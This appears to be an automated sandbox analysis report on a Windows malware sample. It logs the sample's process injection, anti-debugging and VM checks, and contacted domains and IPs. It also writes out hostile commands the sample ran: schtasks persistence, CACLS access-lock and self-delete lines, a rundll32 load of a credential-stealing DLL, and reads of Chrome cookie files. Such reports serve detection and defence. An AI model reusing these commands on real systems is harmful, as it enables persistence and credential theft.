                      Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 1073
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeAPI coverage: 5.5 %
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeThread delayed: delay time: 50000
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeThread delayed: delay time: 180000
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeThread delayed: delay time: 360000
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000
                      Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                      Source: explorer.exe, 00000001.00000000.281683867.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
                      Source: rovwer.exe, 0000000E.00000002.802911113.0000000000ADF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWy
                      Source: rovwer.exe, 0000000E.00000003.603268996.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000E.00000002.806199493.0000000000B07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 00000001.00000000.281683867.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: explorer.exe, 00000001.00000000.333291394.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
                      Source: explorer.exe, 00000001.00000000.281683867.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
                      Source: explorer.exe, 00000001.00000000.338055821.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
                      Source: explorer.exe, 00000001.00000000.269344500.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
                      Source: explorer.exe, 00000001.00000000.338055821.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: RegSvcs.exe, 0000002F.00000002.635321325.000002ADBFFE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00405400 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00420B76 FindFirstFileExW,
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeSystem information queried: ModuleInformation

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Roaming\cttgcewSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Roaming\cttgcewCode function: 11_2_00860D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Roaming\cttgcewCode function: 11_2_0086092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_0041B8D1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_0041DED2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\cttgcewProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\B4A7.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_0041CA50 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_004037D0 DeleteObject,GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00418133 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_0041CA50 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00418A37 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00418B9C SetUnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\explorer.exeDomain query: cdn-102.anonfiles.com
                      Source: C:\Windows\explorer.exeDomain query: bitbucket.org
                      Source: C:\Windows\explorer.exeDomain query: bbuseruploads.s3.amazonaws.com
                      Source: C:\Windows\explorer.exeDomain query: github.com
                      Source: C:\Windows\explorer.exeDomain query: raw.githubusercontent.com
                      Source: C:\Windows\explorer.exeDomain query: o36fafs3sn6xou.com
                      Source: C:\Windows\explorer.exeDomain query: anonfiles.com
                      Source: C:\Windows\explorer.exeDomain query: hoteldostyk.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.3 80
                      Source: C:\Windows\explorer.exeDomain query: iplogger.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 193.56.146.174 80
                      Source: C:\Windows\explorer.exeDomain query: srshf.com
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeDomain query: 1ecosolution.it
                      Source: C:\Windows\explorer.exeNetwork Connect: 193.56.146.168 80
                      Source: C:\Windows\explorer.exeFile created: E35A.exe.1.drJump to dropped file
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\cttgcewSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\cttgcewSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\B4A7.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 protect: page read and write
                      Source: C:\Users\user\AppData\Local\Temp\CF35.exeMemory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                      Source: C:\Users\user\AppData\Local\Temp\B4A7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\CF35.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeMemory written: C:\Users\user\AppData\Local\Temp\EB2B.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00403F40 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeThread created: C:\Windows\explorer.exe EIP: 3851A28
                      Source: C:\Users\user\AppData\Roaming\cttgcewThread created: unknown EIP: 58E1A28
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 103F380
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 103F380
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 103F380
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 103F380
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 103F380
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 103F380
                      Source: C:\Users\user\AppData\Local\Temp\B4A7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000
                      Source: C:\Users\user\AppData\Local\Temp\B4A7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 83E008
                      Source: C:\Users\user\AppData\Local\Temp\CF35.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 400000
                      Source: C:\Users\user\AppData\Local\Temp\CF35.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 401000
                      Source: C:\Users\user\AppData\Local\Temp\CF35.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 91A000
                      Source: C:\Users\user\AppData\Local\Temp\CF35.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: BEA000
                      Source: C:\Users\user\AppData\Local\Temp\CF35.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: FD28B52010
                      Source: C:\Windows\explorer.exeMemory written: PID: 5644 base: 103F380 value: 90
                      Source: C:\Windows\explorer.exeMemory written: PID: 5656 base: 7FF69FF38150 value: 90
                      Source: C:\Windows\explorer.exeMemory written: PID: 5816 base: 103F380 value: 90
                      Source: C:\Windows\explorer.exeMemory written: PID: 5876 base: 7FF69FF38150 value: 90
                      Source: C:\Windows\explorer.exeMemory written: PID: 5068 base: 103F380 value: 90
                      Source: C:\Windows\explorer.exeMemory written: PID: 3932 base: 103F380 value: 90
                      Source: C:\Windows\explorer.exeMemory written: PID: 408 base: 103F380 value: 90
                      Source: C:\Windows\explorer.exeMemory written: PID: 4972 base: 7FF69FF38150 value: 90
                      Source: C:\Windows\explorer.exeMemory written: PID: 5248 base: 103F380 value: 90
                      Source: C:\Users\user\AppData\Local\Temp\CF35.exeThread register set: target process: 5128
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeProcess created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
                      Source: C:\Users\user\AppData\Local\Temp\B4A7.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                      Source: C:\Users\user\AppData\Local\Temp\CF35.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:N"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:R" /E
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeProcess created: C:\Users\user\AppData\Local\Temp\EB2B.exe C:\Users\user\AppData\Local\Temp\EB2B.exe
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeProcess created: C:\Users\user\AppData\Local\Temp\EB2B.exe C:\Users\user\AppData\Local\Temp\EB2B.exe
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\Temp\EB2B.exe" & exit
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00404350 ShellExecuteA,CreateToolhelp32Snapshot,
                      Source: explorer.exe, 00000001.00000000.301080177.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.268529743.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.326594831.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
                      Source: explorer.exe, 00000001.00000000.301080177.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.338421069.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.306181277.0000000006770000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000001.00000000.301080177.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.268529743.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.326594831.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000001.00000000.268292712.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.325898448.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.300435506.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
                      Source: explorer.exe, 00000001.00000000.301080177.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.268529743.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.326594831.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00418857 cpuid
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00418C71 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00424B94 _free,_free,_free,GetTimeZoneInformation,_free,
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_0040B800 GetUserNameA,SetCurrentDirectoryA,RtlAllocateHeap,
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00405400 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 32.3.F771.exe.9c6b90.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.B4A7.exe.716f68.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.B4A7.exe.716f68.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.B4A7.exe.d290000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.3.F771.exe.9c6b90.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.27a0ee8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.B4A7.exe.716f68.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.3.F771.exe.8c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.B4A7.exe.d290000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.880e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.27a0ee8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.B4A7.exe.716f68.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.B4A7.exe.d290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.27a0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.B4A7.exe.716f68.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.267a196.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.267b07e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.267b07e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.B4A7.exe.716f68.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.267a196.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.400000.0.unpack, type: UNPACKEDPE
